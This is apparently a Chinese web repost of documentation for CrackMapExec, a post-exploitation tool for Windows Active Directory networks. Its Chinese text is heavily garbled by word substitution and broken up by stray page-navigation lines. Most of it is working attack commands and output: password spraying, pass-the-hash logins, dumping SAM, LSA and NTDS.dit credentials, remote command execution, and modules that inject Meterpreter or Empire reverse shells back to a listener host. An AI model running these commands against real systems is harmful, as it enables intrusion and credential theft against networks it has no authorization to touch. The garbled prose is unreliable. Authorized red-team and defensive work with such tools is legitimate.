CrackMapExec:一款针对大型Windows活动目录(AD)的后渗透工具

CrackMapExec(CME)是一款后渗透使用对象,可赞助自动化大年夜型活动目录(AD)收集安然评估义务。其创作创造者@byt3bl33d3r称,该对象的生计观点是,“使用AD内置功能/协议杀青其功能,并规避大年夜多半终端防护/IDS/IPS办理规划。”

只管该项目主要用于进击性目的(例如红队),但蓝队同样可以应用该对象来评估账户权限,模拟进击,查找设置设置设备摆设摆设差错。CME还应用PowerSploit对象包和Impacket库。

安装

紧张:在以下所有Bleeding-Edge安装阐明中,请留意通报给git clone敕令的–recursive标志。该标志会让git自动下载CME所依附的所有子模块。假如没有的话,安装将会掉败。

Kali

最新稳定版

#~ apt-get install crackmapexec

Bleeging-Edge

强烈建议应用pipenv来安装CME,以避免依附项与你的系统包孕育发生冲突。

#~ apt-get install -y libssl-dev libffi-dev python-dev build-essential

#~ pip install –user pipenv

#~ git clone –recursive https://github.com/byt3bl33d3r/CrackMapExec

#~ cd CrackMapExec && pipenv install

#~ pipenv shell

#~ python setup.py install

Debian/Ubuntu

强烈建议应用pipenv来安装CME,以避免依附项与你的系统包孕育发生冲突。

最新稳定版

#~ apt-get install -y libssl-dev libffi-dev python-dev build-essential

#~ pip install crackmapexec

Bleeging-Edge

#~ apt-get install -y libssl-dev libffi-dev python-dev build-essential

#~ pip install –user pipenv

#~ git clone –recursive https://github.com/byt3bl33d3r/CrackMapExec

#~ cd CrackMapExec && pipenv install

#~ pipenv shell

#~ python setup.py install

Arch Linux

强烈建议应用pipenv来安装CME,以避免依附项与你的系统包孕育发生冲突。

最新稳定版

pip install crackmapexec

Bleeging-Edge

#~ pip install –user pipenv

#~ git clone –recursive https://github.com/byt3bl33d3r/CrackMapExec

#~ cd CrackMapExec && pipenv install

#~ pipenv shell

#~ python setup.py install

Mac OSX

强烈建议应用pipenv来安装CME,以避免依附项与你的系统包孕育发生冲突。

最新稳定版

pip install –user crackmapexec

Bleeging-Edge

#~ pip install –user pipenv

#~ git clone –recursive https://github.com/byt3bl33d3r/CrackMapExec

#~ cd CrackMapExec && pipenv install

#~ pipenv shell

#~ python setup.py install

Logs

CME输出的任何日志文件都将存储在~/.cme/logs中。

应用协议

从v4开始,CME将其功能划分为简化/组合/模块化(simplify/orginize/modularize)参数解析和功能,并容许将CME的功能扩展至Active Directory之外。

要应用特定协议,请运行:cme

查看可用协议

运行cme –help将列出可用的老例选项和协议:

#~ cme –help

usage: cme [-h] [-v] [-t THREADS] [–timeout TIMEOUT] [–jitter INTERVAL]

[–darrell] [–verbose]

{http,smb,mssql} …

______ .____________________ .______.___._____________ ___________________

/||_\/\/|||// |\/|/\|_\|____|\\ // |____| /|

|,—-‘||_)|/^\|,—-‘|’/|\/|/^\||_)| ||__\V/||__|,—-‘

|||///_\\|||/_\\|___/|__|>—-.||\\—-. /_____\|`—-.|.\||||/_____\||||____/.\||____ |`—-.

\______|| _| `._____|/__/\__\\______||__|\__\ |__||__| /__/\__\ | _||_______|/__/ \__\ |_______| \______|

A swiss army knife for pentesting networks

[1] [2] [3] [4] [5] [6] [7] [8] [9]下一页

Forged by @byt3bl33d3r using the powah of dank memes

Version: 4.0.0dev

Codename: ‘Sercurty’

optional arguments:

-h, –helpshow this help message and exit

-v, –versionshow program’s version number and exit

-t THREADSset how many concurrent threads to use (default: 100)

–timeout TIMEOUTmax timeout in seconds of each thread (default: None)

–jitter INTERVALsets a random delay between each connection (default: None)

–darrellgive Darrell a hand

–verboseenable verbose output

protocols:

available protocols

{http,smb,mssql}

httpown stuff using HTTP(S)

smbown stuff using SMB and/or Active Directory

mssqlown stuff using MSSQL and/or Active Directory

Serrrrrrcuuurrrty?

查看协议选项

运行cme

–help 查看指定协议所支持的选项。例如,查看所有SMB协议选项:

#~ cme smb –help

usage: cme smb [-h] [-id CRED_ID [CRED_ID …]] [-u USERNAME [USERNAME …]]

[-p PASSWORD [PASSWORD …]]

[–gfail-limit LIMIT | –ufail-limit LIMIT | –fail-limit LIMIT]

[-M MODULE] [-o MODULE_OPTION [MODULE_OPTION …]] [-L]

[–options] [–server {http,https}] [–server-host HOST]

[–server-port PORT] [-H HASH [HASH …]]

[-d DOMAIN | –local-auth] [–smb-port {139,445}]

[–share SHARE] [–gen-relay-list OUTPUT_FILE]

[–sam | –lsa | –ntds {vss,drsuapi}] [–shares] [–sessions]

[–disks] [–loggedon-users] [–users [USER]]

[–groups [GROUP]] [–local-groups [GROUP]] [–pass-pol]

[–rid-brute [MAX_RID]] [–wmi QUERY]

[–wmi-namespace NAMESPACE] [–spider SHARE]

[–spider-folder FOLDER] [–content] [–exclude-dirs DIR_LIST]

[–pattern PATTERN [PATTERN …] | –regex REGEX [REGEX …]]

[–depth DEPTH] [–only-files]

[–exec-method {mmcexec,smbexec,wmiexec,atexec}] [–force-ps32]

[–no-output] [-x COMMAND | -X PS_COMMAND]

[target [target …]]

positional arguments:

targetthe target IP(s), range(s), CIDR(s), hostname(s),

上一页[1] [2] [3] [4] [5] [6] [7] [8] [9]下一页

FQDN(s) or file(s) containg a list of targets

optional arguments:

-h, –helpshow this help message and exit

-id CRED_ID [CRED_ID …]

database credential ID(s) to use for authentication

-u USERNAME [USERNAME …]

username(s) or file(s) containing usernames

-p PASSWORD [PASSWORD …]

password(s) or file(s) containing passwords

–gfail-limit LIMITmax number of global failed login attempts

–ufail-limit LIMITmax number of failed login attempts per username

–fail-limit LIMITmax number of failed login attempts per host

-M MODULE, –module MODULE

payload module to use

-o MODULE_OPTION [MODULE_OPTION …]

payload module options

-L, –list-moduleslist available modules

–optionsdisplay module options

–server {http,https}

use the selected server (default: https)

–server-host HOSTIP to bind the server to (default: 0.0.0.0)

–server-port PORTstart the server on the specified port

-H HASH [HASH …], –hash HASH [HASH …]

— SNIP —

目标款式

每个协议都支持以CIDR表示法,IP地址,IP范围,主机名或包孕目标列表的文件款式。

crackmapexec protocol> ms.evilcorp.org

crackmapexec protocol> 192.168.1.0 192.168.0.2

crackmapexec

192.168.1.0/24

crackmapexec protocol> 192.168.1.0-28 10.0.0.1-67

crackmapexec

~/targets.txt

应用凭证

当你必要应用凭证时,你可以运行以下敕令:

crackmapexec

-u username -p password

留意1:应用包孕特殊符号的用户名和密码时,请用单引号将它们包起来,这样shell才会将它们作为字符串解析。

示例:

crackmapexec protocol> target(s)> -u username -p ‘Admin!123@’

留意2:因为Python的参数解析库中存在bug,以短划线( – )开首的凭证将抛出至少一个参数差错消息。要办理此问题,请应用“long”参数款式指定凭证(请留意=符号):

crackmapexec

-u=’-username’ -p=’-Admin!123@’

应用数据库中的凭证集

经由过程应用-id标志指定凭证ID(或多个凭据ID),CME将自动从后端数据库中提取该凭证,并用它进行身份验证:

crackmapexec

-id

爆破&Password Spraying

所有协议都支持暴力破解和密码喷洒(Password Spraying)。有关应用特定协议进行暴力破解/密码喷洒的具体信息,请参阅wiki的响应部分。

经由过程指定一个文件或多个值,CME将应用指定协议自动爆破登录所有目标:

示例:

crackmapexec

-u username1 -p password1 password2

crackmapexec

-u username1 username2 -p password1

crackmapexec

-u ~/file_containing_usernames -p ~/file_containing_passwords

crackmapexec

-u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

应用模块

从v3.1开始,模块的加载和应用要领发生了变更,以使CME更具可移植性并可被打包。

v4.0的每个协议现在都可以拥有自己的模块集。

查看协议的可用模块

运行 cme

-L 查看指定协议的可用模块。

例如,查看SMB协议的所有模块:

#~ cme smb -L

[*] met_injectDownloads the Meterpreter stager and injects it into memory

[*] get_keystrokesLogs keys pressed, time and the active window

[*] empire_execUses Empire’s RESTful API to generate a launcher for the specified listener and executes it

— SNIP —

应用模块

运行 cme

-M 。

例如,运行SMB Mimikatz模块:

#~ crackmapexec smb-u Administrator -p ‘P@ssw0rd’ -M mimikatz

查看模块选项

运行 cme

-M–options 查看模块所支持的选项,例如:

#~ cme smb -M mimikatz –options

上一页[1] [2] [3] [4] [5] [6] [7] [8] [9]下一页

应用模块选项

应用-o标志指定模块选项。所有选项都以KEY=value (msfvenom style)的形式指定。

示例:

#~ cme

-u Administrator -p ‘P@ssw0rd’ -M mimikatz -o COMMAND=’privilege::debug’

数据库老例用法

CME会自动将所有应用/转储的凭据(以及其他信息),存储在首次运行时设置的数据库中。

从CME v4开始,每个协议都有自己的数据库。此外,v4引入了workspaces(类似于Metasploit)。

有关特定协议数据库的具体信息和用法,请参阅Wiki的响应部分。

所有workspaces及其相关数据库都存储在~/.cme/workspaces中。

与数据库交互

CME附带了一个帮助敕令行脚本cmedb,用于与后端数据库的交互。 键入敕令cmedb进入敕令shell:

#~ cmedb

cmedb (default) >

Workspaces

默认workspace的名称为’default’(如提示中所示)。一旦你选择了workspace,那么你在CME中履行的所有操作都将存储在该workspace中。

创建事情区:

cmedb (default) > workspace create test

[*] Creating workspace ‘test’

[*] Initializing HTTP protocol database

[*] Initializing SMB protocol database

[*] Initializing MSSQL protocol database

cmedb (test) >

切换事情区:

cmedb (test) > workspace default

cmedb (default) >

造访协议的数据库

要造访协议的数据库,只需运行proto

,例如:

cmedb (test) > proto smb

cmedb (test)(smb) >

正如你在提示中看到的那样,我们现在位于名为“test”的事情区中,并应用SMB协议的数据库。每个协议数据库都有自己的一组敕令,你可以运行help敕令来查看可用选项。

有关特定协议数据库的具体信息和用法,请参阅Wiki的响应部分。

切换协议数据库:

cmedb (test)(smb) > back

cmedb (test) > proto http

cmedb (test)(http) >

SMB协议

Passing-the-Hash

CME支持应用带-H标志的Passing-The-Hash进击经由过程SMB进行身份验证:

crackmapexec smb target(s)> -u username -H LMHASH:NTHASH

crackmapexec smb-u username -H NTHASH

NULL Sessions

你可以应用”作为用户名和/或密码,即空会话登录

示例:

crackmapexec smb-u ” -p ”

应用SMB数据库

待完成~

从Empire和Metasploit导入凭证

CME异常得当作为Exploit/Post-Exploitation框架之间的“粘合剂”。为此我们添加了许多功能,以便尽可能轻松地让应用者从Empire和Metasploit导入凭证和信息。

从Empire导入凭证

cmedb敕令行脚本可以应用它的RESTful API,直接导入存储在Empire数据库中的凭证,从而使Empire无缝重放转储凭证。有关cmedb脚本和CME数据库的更多信息,请参阅:https://github.com/byt3bl33d3r/CrackMapExec/wiki/Using-the-Database

首先,启动Empire的RESTful API办事器:

#~ python empire –rest –user empireadmin –pass Password123!

[*] Loading modules from: /home/byt3bl33d3r/Tools/Empire/lib/modules/

* Starting Empire RESTful API on port: 1337

* RESTful API token: l5l051eqiqe70c75dis68qjheg7b19di7n8auzml

* Running on https://0.0.0.0:1337/ (Press CTRL+C to quit)

CME用于向Empire的RESTful API进行身份验证的用户名和密码存储在~/.cme/cme.conf文件中:

[Empire]

api_host=127.0.0.1

api_port=1337

username=empireadmin

password=Password123!

[Metasploit]

rpc_host=127.0.0.1

rpc_port=55552

password=abc123

导入Empire的凭证,只需启动cmedb脚本并运行import empire敕令:

#~ cmedb

cmedb > creds

Credentials:

CredIDAdmin OnCredTypeDomainUserNamePassword

——————————————–

cmedb > import empire

[+] Empire credential import successful

cmedb > creds

Credentials:

CredIDAdmin OnCredTypeDomainUserNamePassword

——————————————–

10 Host(s)hashlab.localyomamae19ccf75ee54e06b06a5907af13cef42

20 Host(s)plaintextlab.localyomamaP@ssw0rd

cmedb >

从Metasploit导入凭证

即将实现~

Getting Shells 101

Empire Agent

我们可以应用empire_exec模块,来履行Empire Agent的初始stager。在后台,模块连接到Empire的RESTful API,并为指定的listener天生launcher并履行它。

上一页[1] [2] [3] [4] [5] [6] [7] [8] [9]下一页

首先,设置一个Empirelistener:

(Empire: listeners) > set Name test

(Empire: listeners) > set Host 192.168.10.3

(Empire: listeners) > set Port 9090

(Empire: listeners) > set CertPath data/empire.pem

(Empire: listeners) > run

(Empire: listeners) > list

[*] Active listeners:

IDNameHostTypeDelay/JitterKillDateRedirect Target

—————————————————-

1testhttp://192.168.10.3:9090native5/0.0

(Empire: listeners) >

启动Empire的RESTful API办事器:

#~ python empire –rest –user empireadmin –pass Password123!

[*] Loading modules from: /home/byt3bl33d3r/Tools/Empire/lib/modules/

* Starting Empire RESTful API on port: 1337

* RESTful API token: l5l051eqiqe70c75dis68qjheg7b19di7n8auzml

* Running on https://0.0.0.0:1337/ (Press CTRL+C to quit)

CME用于向Empire的RESTful API进行身份验证的用户名和密码存储在~/.cme/cme.conf文件中:

[Empire]

api_host=127.0.0.1

api_port=1337

username=empireadmin

password=Password123!

[Metasploit]

rpc_host=127.0.0.1

rpc_port=55552

password=abc123

然后运行empire_exec模块,并指定listener名称:

#~ crackmapexec 192.168.10.0/24 -u username -p password -M empire_exec -o LISTENER=test

Meterpreter

我们可以应用metinject模块,应用PowerSploit的Invoke-Shellcode.ps1脚本直接将meterpreter注入到内存。

首先,设置handler处置惩罚法度榜样:

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_https

payload => windows/meterpreter/reverse_https

msf exploit(handler) > set LHOST 192.168.10.3

LHOST => 192.168.10.3

msf exploit(handler) > set exitonsession false

exitonsession => false

msf exploit(handler) > exploit -j

[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://192.168.10.3:8443

msf exploit(handler) > [*] Starting the payload handler…

然后运行metinject模块,并指定LHOST和LPORT的值:

#~ crackmapexec 192.168.10.0/24 -u username -p password -M metinject -o LHOST=192.168.10.3 LPORT=8443

敕令履行

在Windows系统上履行敕令必要拥有治理员凭证,CME会在身份验证成功时经由过程向输出添加 ‘(Pwn3d!)’ 来自动奉告你正在应用的凭证集是否具有对主机的治理造访权限。

有关若何应用凭证的具体信息,请参阅凭证部分。

履行措施

CME有三种不合的敕令履行措施:

1.wmiexec:经由过程WMI履行敕令

2.atexe:经由过程Windows义务调整法度榜样调整义务来履行敕令

3.smbexec:经由过程创建和运行办事来履行敕令

默认环境下,CME将按以下顺序履行敕令(假如掉败一一考试测验):

1.wmiexec

2.atexec

3.smbexec

假如你想要指天敕令履行的措施,可以应用–exec-method标志。

履行敕令

鄙人面的示例中,我们考试测验应用-x标志在目标上履行whoami敕令:

#~ crackmapexec 192.168.10.11 -u Administrator -p ‘P@ssw0rd’ -x whoami

06-05-2016 14:34:35 CME192.168.10.11:445 WIN7BOX[*] Windows 6.1 Build 7601 (name:WIN7BOX) (domain:LAB)

06-05-2016 14:34:35 CME192.168.10.11:445 WIN7BOX[+] LAB\Administrator:P@ssw0rd (Pwn3d!)

06-05-2016 14:34:39 CME192.168.10.11:445 WIN7BOX[+] Executed command

06-05-2016 14:34:39 CME192.168.10.11:445 WIN7BOXlab\administrator

06-05-2016 14:34:39 [*] KTHXBYE!

你还可以应用-X标志来直接履行PowerShell敕令:

#~ crackmapexec 192.168.10.11 -u Administrator -p ‘P@ssw0rd’ -X ‘$PSVersionTable’

06-05-2016 14:36:06 CME192.168.10.11:445 WIN7BOX[*] Windows 6.1 Build 7601 (name:WIN7BOX) (domain:LAB)

上一页[1] [2] [3] [4] [5] [6] [7] [8] [9]下一页

06-05-2016 14:36:06 CME192.168.10.11:445 WIN7BOX[+] LAB\Administrator:P@ssw0rd (Pwn3d!)

06-05-2016 14:36:10 CME192.168.10.11:445 WIN7BOX[+] Executed command

06-05-2016 14:36:10 CME192.168.10.11:445 WIN7BOXNameValue

06-05-2016 14:36:10 CME192.168.10.11:445 WIN7BOX———

06-05-2016 14:36:10 CME192.168.10.11:445 WIN7BOXCLRVersion2.0.50727.5420

06-05-2016 14:36:10 CME192.168.10.11:445 WIN7BOXBuildVersion6.1.7601.17514

06-05-2016 14:36:10 CME192.168.10.11:445 WIN7BOXPSVersion2.0

06-05-2016 14:36:10 CME192.168.10.11:445 WIN7BOXWSManStackVersion2.0

06-05-2016 14:36:10 CME192.168.10.11:445 WIN7BOXPSCompatibleVersions{1.0, 2.0}

06-05-2016 14:36:10 CME192.168.10.11:445 WIN7BOXSerializationVersion1.1.0.1

06-05-2016 14:36:10 CME192.168.10.11:445 WIN7BOXPSRemotingProtocolVersion2.1

06-05-2016 14:36:10 [*] KTHXBYE!

Powershell敕令可以强制在32位进程中运行:

#~ crackmapexec 192.168.10.11 -u Administrator -p ‘P@ssw0rd’ -X ‘[System.Environment]::Is64BitProcess’ –force-ps32

SMB192.168.10.11445WIN7BOX[*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7BOX) (domain:LAB) (signing:False) (SMBv1:True)

SMB192.168.10.11445WIN7BOX[+] LAB\Administrator:P@ssw0rd (Pwn3d!)

SMB192.168.10.11445WIN7BOX[+] Executed command

SMB192.168.10.11445WIN7BOXfalse

其他开关包括:

–no-outputDoes not retrieve command results

相关敕令参考

SMB:敕令参考

以下我们假设你已将Kali Linux主机连接到内网,且主机的IP段为192.168.1.0/24。假如CME没有任何的输出,则可能是你的敕令有误。

映射/罗列

映射收集主机

返回存活主机列表

#~ cme smb 192.168.1.0/24

结果如下:

SMB192.168.1.101445DC2012A[*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012A) (domain:OCEAN) (signing:True) (SMBv1:True)

SMB192.168.1.102445DC2012B[*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012B) (domain:EARTH) (signing:True) (SMBv1:True)

SMB192.168.1.110445DC2016A[*] Windows Server 2016 Standard Evaluation 14393 x64 (name:DC2016A) (domain:OCEAN) (signing:True) (SMBv1:True)

上一页[1] [2] [3] [4] [5] [6] [7] [8] [9]下一页

SMB192.168.1.117445WIN10DESK1[*] WIN10DESK1 x64 (name:WIN10DESK1) (domain:OCEAN) (signing:False) (SMBv1:True)

天生中继列表

映射实时收集主机并仅保存必要SMB署名的主机列表。列表款式为每行一个IP。

#~ cme smb 192.168.1.0/24 –gen-relay-list relaylistOutputFilename.txt

结果如下:

SMB192.168.1.101445DC2012A[*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012A) (domain:OCEAN) (signing:True) (SMBv1:True)

SMB192.168.1.102445DC2012B[*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012B) (domain:EARTH) (signing:True) (SMBv1:True)

SMB192.168.1.111445SERVER1[*] Windows Server 2016 Standard Evaluation 14393 x64 (name:SERVER1) (domain:PACIFIC) (signing:False) (SMBv1:True)

SMB192.168.1.117445WIN10DESK1[*] WIN10DESK1 x64 (name:WIN10DESK1) (domain:OCEAN) (signing:False) (SMBv1:True)

…SNIP…

#~ cat relaylistOutputFilename.txt

192.168.1.111

192.168.1.117

罗列共享

#~ cme smb 192.168.1.0/24 -u UserNAme -p ‘PASSWORDHERE’ –shares

罗列有效sessions

#~ cme smb 192.168.1.0/24 -u UserNAme -p ‘PASSWORDHERE’ –sessions

罗列磁盘

#~ cme smb 192.168.1.0/24 -u UserNAme -p ‘PASSWORDHERE’ –disks

罗列登任命户

#~ cme smb 192.168.1.0/24 -u UserNAme -p ‘PASSWORDHERE’ –loggedon-users

罗列域用户

#~ cme smb 192.168.1.0/24 -u UserNAme -p ‘PASSWORDHERE’ –users

经由过程爆破RID罗列用户

#~ cme smb 192.168.1.0/24 -u UserNAme -p ‘PASSWORDHERE’ –rid-brute

罗列域组

#~ cme smb 192.168.1.0/24 -u UserNAme -p ‘PASSWORDHERE’ –groups

罗列本地组

#~ cme smb 192.168.1.0/24 -u UserNAme -p ‘PASSWORDHERE’ –local-groups

获取域密码策略

#~ cme smb 192.168.1.0/24 -u UserNAme -p ‘PASSWORDHERE’ –pass-pol

身份验证+凭证反省(域)

登录掉败 [ – ] 成功登录 [+] Domain\Username:Password

本地治理员造访结果在登录确认后添加了(Pwn3d!),如下所示。

SMB192.168.1.101445HOSTNAME[+] DOMAIN\Username:Password (Pwn3d!)

以下反省将考试测验对全部/24网段进行身份验证,你也可以针对单个目标。

User/Password

#~ cme smb 192.168.1.0/24 -u UserNAme -p ‘PASSWORDHERE’

User/Hash

获取凭证后例如:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::

你可以应用完备哈希或只应用nt哈希(后半部分)

#~ cme smb 192.168.1.0/24 -u UserNAme -H ‘LM:NT’

#~ cme smb 192.168.1.0/24 -u UserNAme -H ‘NTHASH’

#~ cme smb 192.168.1.0/24 -u Administrator -H ’13b29964cc2480b4ef454c59562e675c’

#~ cme smb 192.168.1.0/24 -u Administrator -H ‘aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c’

Null Sessions

#~ cme smb 192.168.1.0/24 -u ” -p ”

假如有多个域正在运行,你可能必要应用-d来指定目标域。例如,对labnet.com域进行身份验证。

#~ cme smb 192.168.1.0/24 -u UserNAme -p “PASSWORDHERE” -d LABNET

应用Username/Password列表

你可以以空格分隔 名称/密码 的形式应用多个用户名和密码。

#~ cme smb 192.168.1.101 -u user1 user2 user3 -p Summer18

#~ cme smb 192.168.1.101 -u user1 -p password1 password2 password3

CME吸收包孕用户名和密码的txt文件(每行一个用户/密码)。留意帐户锁定!

#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18

#~ cme smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt

*留意*:在默认环境下,CME将在成功登录退却撤退出。假如你并不想退出,可以应用–continue-on-success标志。

#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18 –continue-on-success

身份验证/凭证反省(本地)

将–local-auth添加到任何身份验证敕令并考试测验在本地登录。

#~ cme smb 192.168.1.0/24 -u UserNAme -p ‘PASSWORDHERE’ –local-auth

#~ cme smb 192.168.1.0/24 -u ” -p ” –local-auth

#~ cme smb 192.168.1.0/24 -u UserNAme -H ‘LM:NT’ –local-auth

#~ cme smb 192.168.1.0/24 -u UserNAme -H ‘NTHASH’ –local-auth

#~ cme smb 192.168.1.0/24 -u localguy -H ’13b29964cc2480b4ef454c59562e675c’ –local-auth

#~ cme smb 192.168.1.0/24 -u localguy -H ‘aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c’ –local-auth

结果如下:

SMB192.168.1.101445HOSTNAME[+] HOSTNAME\Username:Password (Pwn3d!)

上一页[1] [2] [3] [4] [5] [6] [7] [8] [9]下一页

获取凭据

以下示例应用用户名和明文密码,只管用户/散列组合也可以应用。

必要目标域节制器上的域治理员或本地治理员权限。

应用secretsdump.py中的措施转储SAM哈希值

#~ cme smb 192.168.1.0/24 -u UserNAme -p ‘PASSWORDHERE’ –sam

应用secretsdump.py中的措施转储LSA secrets

#~ cme smb 192.168.1.0/24 -u UserNAme -p ‘PASSWORDHERE’ –lsa

应用secretsdump.py中的措施从目标DC转储NTDS.dit

2 methods are available:

(default)drsuapi -Uses drsuapi RPC interface create a handle, trigger replication, and combined with

additional drsuapi calls to convert the resultant linked-lists into readable format

vss – Uses the Volume Shadow copy Service

#~ cme smb 192.168.1.100 -u UserNAme -p ‘PASSWORDHERE’ –ntds

#~ cme smb 192.168.1.100 -u UserNAme -p ‘PASSWORDHERE’ –ntds vss

应用secretsdump.py中的措施从目标DC转储NTDS.dit密码历史记录

#~ cme smb 192.168.1.0/24 -u UserNAme -p ‘PASSWORDHERE’ –ntds-history

显示每个NTDS.dit帐户的pwdLastSet属性

#~ cme smb 192.168.1.0/24 -u UserNAme -p ‘PASSWORDHERE’ –ntds-pwdLastSet

Spidering Shares

用于spider远程系统共享。

spider C盘中文件名中带有txt的文件(找到sometxtfile.html和somefile.txt)

留意:‘$’字符必须进行转义。

#~ cme SMB-u USER -p PASSWORD –spider C\$ –pattern txt

WMI查询履行

有关wmi查询及语法的更多信息,请参阅:https://docs.microsoft.com/en-us/windows/desktop/wmisdk/invoking-a-synchronous-query

发出指定的WMI查询

User/Password

#~ cme smb 10.10.33.121 -u Administrator -p ‘P@ssw0rd’ –wmi “SELECT * FROM Win32_logicalDisk WHERE DeviceID = ‘C:'”

SMB192.168.10.11445WIN7BOX[*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7BOX) (domain:LAB) (signing:False) (SMBv1:True)

SMB192.168.10.11445WIN7BOX[+] LAB\Administrator:P@ssw0rd (Pwn3d!)

SMB192.168.10.11445WIN7BOXCaption => C:

SMB192.168.10.11445WIN7BOXDescription => Local Fixed Disk

SMB192.168.10.11445WIN7BOXInstallDate => 0

SMB192.168.10.11445WIN7BOXName => C:

SMB192.168.10.11445WIN7BOXStatus => 0

SMB192.168.10.11445WIN7BOXAvailability => 0

SMB192.168.10.11445WIN7BOXCreationClassName => Win32_LogicalDisk

SMB192.168.10.11445WIN7BOXConfigManagerErrorCode => 0

SMB192.168.10.11445WIN7BOXConfigManagerUserConfig => 0

SMB192.168.10.11445WIN7BOXDeviceID => C:

WMI Namespace

User/Password

#~ cme smb 192.168.1.0/24 -u UserNAme -p ‘PASSWORDHERE’ –wmi-namespace ‘root\\cimv2’

HTTP:敕令参考

以下我们假设你已将Kali Linux主机连接到内网,且主机的IP段为192.168.1.0/24。假如CME没有任何的输出,则可能是你的敕令有误。

Own stuff using HTTP

必要安装phantomjs。假如你是经由过程apt-get进行安装的话,请先删除该版本,然后再从网站安装。

>wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-2.1.1-linux-x86_64.tar.bz2

>tar xvjf phantomjs-2.1.1-linux-x86_64.tar.bz2

>mv phantomjs-2.1.1-linux-x86_64/bin/phantomjs /bin/

>phantomjs -v

映射/罗列

识别HTTP(S)办事器和指纹

返回实时webservers和banners列表

默认反省:80,443,8443,8008,8080,8081 端口

#~ cme http 192.168.1.0/24

结果如下:

HTTP192.168.1.1178080192.168.1.117[*] http://192.168.1.117:8080/ (Server: Apache-Coyote/1.1) (Page Title: Apache Tomcat)

上一页[1] [2] [3] [4] [5] [6] [7] [8] [9]下一页

HTTP192.168.1.11780192.168.1.117[*] http://192.168.1.117/install/login (Server: Apache/2.4.18 (Ubuntu)) (Page Title: HackME)

HTTP192.168.1.12080192.168.1.120[*] http://192.168.1.120/default.html (Server: IIS/8.5 (ASP.NET)) (Page Title: Welcome)

HTTP192.168.1.125443192.168.1.125[*] https://192.168.1.125/ (Server: Jetty/8.0 ()) (Page Title: QuickStart)

指定端口

#~ cme http 192.168.1.0/24 –port 80 81 82 8080

指定协议

#~ cme http 192.168.1.0/24 –transports http

所在页面截图,并以 IP:Port_Year-month-day_time.png的款式保存在“/.cme/logs”目录下。

#~ cme http 192.168.1.117 –port 80 81 82 8080 –screenshot

HTTP192.168.1.1178080192.168.1.117[*] http://192.168.1.117:8080/ (Server: Apache-Coyote/1.1) (Page Title: Apache Tomcat)

HTTP192.168.1.11780192.168.1.117[*] http://192.168.1.117/install/login (Server: Apache/2.4.18 (Ubuntu)) (Page Title: HackME)

HTTP192.168.1.1178080192.168.1.117[+] Screenshot stored at /root/.cme/logs/192.168.1.117:8080_2018-08-29_093828.png

HTTP192.168.1.11780192.168.1.117[+] Screenshot stored at /root/.cme/logs/192.168.1.117:80_2018-08-29_093828.png

上一页[1] [2] [3] [4] [5] [6] [7] [8] [9]

赞(0) 打赏
分享到: 更多 (0)
免责申明:本站所有资料均来自于网络,版权归原创者所有!本站不提供任何保证,不保证真实性,并不承担任何法律责任

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

阿里云优惠网 更专业 更优惠

阿里云优惠券阿里云大礼包